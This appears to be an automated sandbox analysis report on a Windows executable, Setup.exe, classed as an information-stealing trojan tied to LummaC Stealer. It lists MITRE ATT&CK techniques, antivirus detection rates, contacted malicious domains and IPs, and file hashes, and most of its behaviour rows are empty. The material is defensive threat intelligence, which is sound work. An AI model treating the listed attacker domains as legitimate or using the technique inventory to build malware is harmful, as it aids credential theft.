Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Last function: |
Source: | Code function: | 0_2_004062D5 | |
Source: | Code function: | 0_2_00402E18 | |
Source: | Code function: | 0_2_00406C9B |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_004062FC |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 0_2_00406805 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Source: | Directory queried: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 23 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 12 Process Injection | 2 Obfuscated Files or Information | 11 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 21 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | 11 Input Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 111 Masquerading | NTDS | 3 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 115 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 221 Virtualization/Sandbox Evasion | LSA Secrets | 221 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
35% | Virustotal | Browse | ||
32% | ReversingLabs | Win32.Ransomware.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cegu.shop | 185.161.251.21 | true | false | high | |
steamcommunity.com | 104.102.49.254 | true | false | high | |
sputnik-1985.com | 104.21.32.1 | true | false | high | |
klipgonuh.shop | 172.67.162.153 | true | false | high | |
robinsharez.shop | unknown | unknown | true | unknown | |
versersleep.shop | unknown | unknown | true | unknown | |
chipdonkeruz.shop | unknown | unknown | true | unknown | |
femalsabler.shop | unknown | unknown | true | unknown | |
soundtappysk.shop | unknown | unknown | true | unknown | |
vqOdvwsaFkSmirvHugHUcNrMgvS.vqOdvwsaFkSmirvHugHUcNrMgvS | unknown | unknown | true | unknown | |
crowdwarek.shop | unknown | unknown | true | unknown | |
dfgh.online | unknown | unknown | false | high | |
apporholis.shop | unknown | unknown | true | unknown | |
handscreamny.shop | unknown | unknown | true | unknown | |
throwlette.cyou | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false | high | ||
false |
| unknown | |
false | high | ||
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.32.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENETUS | false | |
185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false | |
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false | |
172.67.162.153 | klipgonuh.shop | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588280 |
Start date and time: | 2025-01-10 23:26:28 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 6m 15s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Setup.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@30/31@15/4 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 4.175.87.197
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 6008 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenFile calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryDirectoryFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
17:27:20 | API Interceptor | |
17:27:24 | API Interceptor | |
17:28:48 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.21.32.1 | Get hash | malicious | FormBook | Browse |
| |
Get hash | malicious | CMSBrute | Browse |
| ||
185.161.251.21 | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC | Browse | |||
104.102.49.254 | Get hash | malicious | Socks5Systemz | Browse |
| |
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
cegu.shop | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
steamcommunity.com | Get hash | malicious | Vidar | Browse |
| |
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
sputnik-1985.com | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
NTLGB | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
AKAMAI-ASUS | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | Vidar | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | GuLoader, MassLogger RAT | Browse |
| ||
Get hash | malicious | GuLoader, Snake Keylogger | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | Get hash | malicious | LummaC | Browse |
| |
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC | Browse |
| ||
Get hash | malicious | LummaC Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com | Get hash | malicious | LummaC | Browse | ||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | LummaC Stealer | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | LummaC | Browse |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | modified |
Size (bytes): | 947288 |
Entropy (8bit): | 6.630612696399572 |
Encrypted: | false |
SSDEEP: | 24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK |
MD5: | 62D09F076E6E0240548C2F837536A46A |
SHA1: | 26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2 |
SHA-256: | 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49 |
SHA-512: | 32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 492815 |
Entropy (8bit): | 7.99963238435519 |
Encrypted: | true |
SSDEEP: | 12288:drr3dC8mtj8VRp1FIPIbdWgRFc3Hg3DTOF7F:dHc8mtIVvZb8HET2 |
MD5: | 62E1DA734E25181A078D28A393E5A06E |
SHA1: | A1371AED97991829F3DF480FF870CB0894AD0559 |
SHA-256: | B811E8880DCF6D208CB732588AEA477DE9AC243FECF948B9E52F159F54B84DFE |
SHA-512: | A5C083398B191DF1D61661D6A8EA1D49DC09D0BAD2F85A5C17CE8843A4F8BCDA38B07BD435382E5C9AAFDB4E498E389E790526FDEF86B25EFB614B6611C37A23 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\Setup.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 56320 |
Entropy (8bit): | 7.996885280434359 |
Encrypted: | true |
SSDEEP: | 1536:gDP/tFh7QmK7d+U7cKMFSaTs9k3zkeqvKpNT:KDh47cKMFSa4QkeeKb |
MD5: | D3C55013D2CA4C486CFFA49094FBDC96 |
SHA1: | 2CAEDCACA612C49250D7CE6691D28A0861C41409 |
SHA-256: | 297A4997CEEC7D805C0FB06BD37D564267FD5526023152CAAA0E89B82E8D0947 |
SHA-512: | 2D04C88AEEF677782A39493E8AA5C18D2D98AA46CD2026FE3BC66A45B63A59B66B7ACFA0BAD8005EC1D8618B995253BB1DA7424CE4010D29A3C2B22F77B72C17 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\extrac32.exe |
File Type: | |
Category: | dropped |
